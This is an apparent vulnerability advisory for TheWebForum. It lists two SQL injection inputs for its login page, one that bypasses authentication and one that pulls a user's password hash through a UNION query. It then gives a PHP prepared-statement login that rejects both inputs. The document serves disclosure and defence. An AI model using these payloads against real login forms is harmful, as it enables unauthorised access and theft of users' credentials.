TheWebForum Multiple Input Validation Vulnerabilities
An exploit is not required. The following proof of concept examples are available:

Authentication bypass example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword

Get user's password hash example (SQL Injection):
http://www.example.com/twf/login.php
User Name: a' union select N,password, 3 from users/*

The user name will then contain the password hash of the user with ID=N.
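
For comparison, a login check that binds the user name as a query parameter treats both inputs above as literal strings. This is an added example, not TheWebForum's code: the `id`/`name` columns, the in-memory SQLite database, the sample account and the function names are assumptions, since the page names only the `users` table and its `password` column.

```php
<?php
declare(strict_types=1);

// Assumed schema: the page names only the `users` table and `password` column.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT UNIQUE, password TEXT)');
    // Constructed sample account.
    $ins = $db->prepare('INSERT INTO users (name, password) VALUES (?, ?)');
    $ins->execute(['alice', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);
    return $db;
}

// Returns the user id on success, null on any failure.
function login(PDO $db, string $name, string $password): ?int {
    // The user name is bound as data, so quotes, UNION and /* never reach the SQL parser as syntax.
    $st = $db->prepare('SELECT id, password FROM users WHERE name = ?');
    $st->execute([$name]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    // The password is checked in PHP; the stored hash is never returned to the caller.
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    return (int) $row['id'];
}

$db = make_db();
$cases = [
    ['alice', 'constructed-sample-pw'],                              // legitimate login
    ["a' or 'a'='a'/*", 'anypassword'],                              // first input from the page
    ["a' union select 1,password, 3 from users/*", 'anypassword'],   // second input, with N=1
];
foreach ($cases as [$user, $pass]) {
    $result = login($db, $user, $pass) === null ? 'rejected' : 'accepted';
    printf("%-45s => %s\n", $user, $result);
}
```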